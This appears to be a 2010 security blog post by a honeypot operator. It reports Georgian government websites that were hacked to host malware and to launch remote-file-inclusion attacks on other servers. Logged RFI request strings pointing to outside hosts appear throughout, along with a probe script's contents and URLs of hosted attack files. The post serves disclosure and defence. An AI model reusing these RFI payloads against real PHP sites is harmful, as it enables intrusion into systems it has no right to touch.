*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect.
Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems.
It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t defaced their web page. They just added some malware and scripts to attack others.
How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?
I started seeing the first attacks on January 12th, trying to load RFI (remote files) from psg.gov.ge:
a.b.147.154 – - [12/Jan/2010:14:05:43 -0200] “GET ///?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 6312 “-” “Mozilla/5.0″
a.b..147.154 – - [12/Jan/2010:14:05:46 -0200] “GET /xxx//?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 7281 “-” “Mozilla/5.0″
A few days later I started seeing more attacks using malware hosted from www.justice.gov.ge
a.b.63.102 – - [14/Jan/2010:03:04:23 -0200] “GET /xxx*.php?page=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″
That’s when I decided to look deeper at the issue. The respon1.txt is a common file used on RFI attacks:
$ lynx –dump –source http://www.justice.gov.ge//album/respon1.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>
Then I went to look at this “album” directory and that really shocked me. When you visit http://www.justice.gov.ge/album/ you can see a full collection of malware:
A look at the top of the simbah.txt shows a “funny” message: http://www.justice.gov.ge/album/simbah.txt
# % private hackers pwned your box %
Even a remote proxy is there at http://www.justice.gov.ge/album/proxy.tgz
If that was not bad enough, by the end of January I started to see their own IP addresses attacking others:
18.104.22.168 – - [01/Feb/2010:04:41:09 -0200] “GET //include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1″ 200 36 “-” “libwww-perl/5.805″
22.214.171.124 – - [01/Feb/2010:04:41:09 -0200] “GET /xxx/include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1″ 200 36 “-” “libwww-perl/5.805″
126.96.36.199 – - [23/Jan/2010:16:07:29 -0200] “GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″
So, at the end, we have some sites from the Georgia government hosting malware and these 4 attacking others:
www.psg.gov.ge – 188.8.131.52 (redirects now to justice.gov.ge)
www.justice.gov.ge – 184.108.40.206
moh.gov.ge – 220.127.116.11
mail.justice.gov.ge – 18.104.22.168
If you have any contact at the Georgie government, let them know about this post. I have been trying to speak with someone since January without success. Maybe with some extra exposure they will notice and fix it.